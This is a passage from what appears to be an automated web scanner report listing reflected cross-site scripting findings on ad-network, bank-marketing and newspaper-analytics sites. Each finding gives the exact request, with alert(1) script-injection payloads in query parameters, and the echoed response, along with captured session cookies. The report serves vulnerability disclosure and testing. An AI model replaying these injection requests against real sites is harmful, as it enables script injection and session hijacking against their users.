// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='c7cb1';alert(1)//8a1d92bd133';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c7cb1';alert(1)//8a1d92bd133;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.93. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2059a"%3balert(1)//3c744e65e36 was submitted in the q parameter. This input was echoed as 2059a";alert(1)//3c744e65e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=2059a"%3balert(1)//3c744e65e36&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='2059a";alert(1)//3c744e65e36';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=2059a";alert(1)//3c744e65e36;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.94. http://citi.bridgetrack.com/cbol/10/tiered_checking/default.htm [CMP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /cbol/10/tiered_checking/default.htm

Issue detail

The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87dce'%3balert(1)//cd49a21da3a was submitted in the CMP parameter. This input was echoed as 87dce';alert(1)//cd49a21da3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cbol/10/tiered_checking/default.htm?Promo_ID=CH62&CMP=KNC%2DMSN1%5FOLA87dce'%3balert(1)//cd49a21da3a&BT_SC=B%2EC%2EBJM%2Ej0%2EBbQ%2EX68%2EI9I%2EA%2EEKh&BT_TRF=27911&BT_MKWD=e%5Fdd6a510853e09300af83813511944be1&ef_id=zMRNSrCqAAABBiA%3A20110203134202%3As&ProspectID=6D86ACEB960B46F287AE0BAB34073BEC HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; ATC1=25666dU8K6Rcc4ICcPKNLc2c27Kc2VLSc13Q8c5MGcR87ccccccccc; TVM402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3=T=1296740522949; CitiBTSES=SID=2100CDA941274771A8C1290EFDC21B8F; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F1=VTI3PTY=&VTIEML=0&VTITRF=27911&VTIPUB=2&TX=1296740523&VTIWAV=0&VTISEG=0&VTICAT=5840&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3&VTIVEN=2292&SID=6D86ACEB960B46F287AE0BAB34073BEC&GUID=AC51251795744B1CB850CA9CB046EBD8; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Wed, 02 Feb 2011 13:43:10 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=2100CDA941274771A8C1290EFDC21B8F; path=/
Set-Cookie: CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8&SID=6D86ACEB960B46F287AE0BAB34073BEC&VTIVEN=2292&VTI=402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3&VTIAS=0&VTILNK=0&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTIPRC=0&VTICAT=5840&VTISEG=0&VTIWAV=0&TX=1296740523&VTIPUB=2&VTITRF=27911&VTIEML=0&VTI3PTY=; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Date: Thu, 03 Feb 2011 13:43:09 GMT
Connection: close
Content-Length: 14082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<script type='text/javascript' language='javascript'>
hbx.acct='DM550608DPBR';
hbx.pn='/KNC-MSN1_OLA87dce';alert(1)//cd49a21da3a';
hbx.mlc='/CBOL/Campaigns/LandingPage/BT_Popup';
</script>
...[SNIP]...

1.95. http://common.cdn.onset.freedom.com/tools/load.php [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 8d4ab<script>alert(1)</script>26bbc880e6b was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:46 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:46 GMT
ETag: "3e96ae5b9a43fcda3ef515d03304a9d6-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 80952

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3
...[SNIP]...

1.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c071b<script>alert(1)</script>68b91996e9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:50 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:50 GMT
ETag: "c833a993b4a7a934d84484ad93124520-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 86888

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3,h4,h5,h6,
pre
...[SNIP]...

1.97. http://common.cdn.onset.freedom.com/tools/load.php [scode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 8d317<script>alert(1)</script>6d5518f0373 was submitted in the scode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:49 GMT
ETag: "63029f1bf18ce33fe44a9bdae196c917-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:47 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 22441

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 */
/*generic freedom site styles, take layout.css styles and define fonts, background images, etc */

/* define page areas */
body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 100%;
...[SNIP]...

1.98. http://common.onset.freedom.com/fi/analytics/cms/ [ctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014d"%3balert(1)//21a83927387 was submitted in the ctype parameter. This input was echoed as 1014d";alert(1)//21a83927387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error1014d"%3balert(1)//21a83927387&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:44 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n19), ms iad-agg-n19 ( sfo-agg-n1), ms sfo-agg-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:45 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28742

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
rn new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}


s.pageName="";
s.server="mortgage.freedomblogging.com";
s.channel="business";
s.pageType="";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="error1014d";alert(1)//21a83927387";
s.prop5="blogs|mortgage";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18="";
s.prop19=""
...[SNIP]...

1.99. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript inline comment. The payload d8ddc*/alert(1)//26af18f6098 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:41 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n28), ms sfo-agg-n28 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:41 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
4="10:50";
s.eVar6="";
s.hier1="business|realestate|blogs|mortgage|root";
s.hier2="mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098|blogs|mortgage|root";
/** domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098 **/

/** referer=http://mortgage.ocregister.com/feeda71cd%22%3e%3cscript%3ealert(1)%3c/script%3e1f35e8c0ea2/ **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t()
...[SNIP]...

1.100. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9298"%3balert(1)//3579af22c1e was submitted in the domain parameter. This input was echoed as e9298";alert(1)//3579af22c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.come9298"%3balert(1)//3579af22c1e&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:40 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n34), ms sfo-agg-n34 ( origin)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:40 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
<0){eval(c);return new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}


s.pageName="";
s.server="mortgage.freedomblogging.come9298";alert(1)//3579af22c1e";
s.channel="business";
s.pageType="errorPage";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="error";
s.prop5="blogs|mortgage";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.
...[SNIP]...

1.101. http://common.onset.freedom.com/fi/analytics/cms/ [ghier parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the ghier request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca8c"%3b4150865a2c4 was submitted in the ghier parameter. This input was echoed as aca8c";4150865a2c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogsaca8c"%3b4150865a2c4 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:55:05 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n7), ms sfo-agg-n7 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:55:05 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28761

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";s.prop21="";
s.prop22="";
s.prop23="foci";
s.prop24="foci";
s.prop25="blogsaca8c";4150865a2c4";
s.prop27=window.location.href;
s.prop28="fiocregister";
s.prop29="business|realestate|blogs|mortgage";
s.prop33="Onset";
s.prop34="";
s.prop42="free";
s.prop41="anonymous";
s.eVar11='Non-Registered'
...[SNIP]...

1.102. http://common.onset.freedom.com/tools/load.php [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 2441a<script>alert(1)</script>3c82a873a6e was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n6), ms iad-agg-n6 ( sfo-agg-n45), ms sfo-agg-n45 ( origin)
ETag: "f4f38c4aee23a73f09d77826215df995-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:29 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:29 GMT
Connection: keep-alive
Content-Length: 80952

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3
...[SNIP]...

1.103. http://common.onset.freedom.com/tools/load.php [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 56f76<script>alert(1)</script>f1eb6477288 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:25 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "f9bfbcc84f8fc00f069b546540ef24b0-119"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:25 GMT
Connection: keep-alive
Content-Length: 119

/* http://common.cdn.onset.freedom.com/tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister */

1.104. http://common.onset.freedom.com/tools/load.php [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload c4d58*/alert(1)//cadae76dd14 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
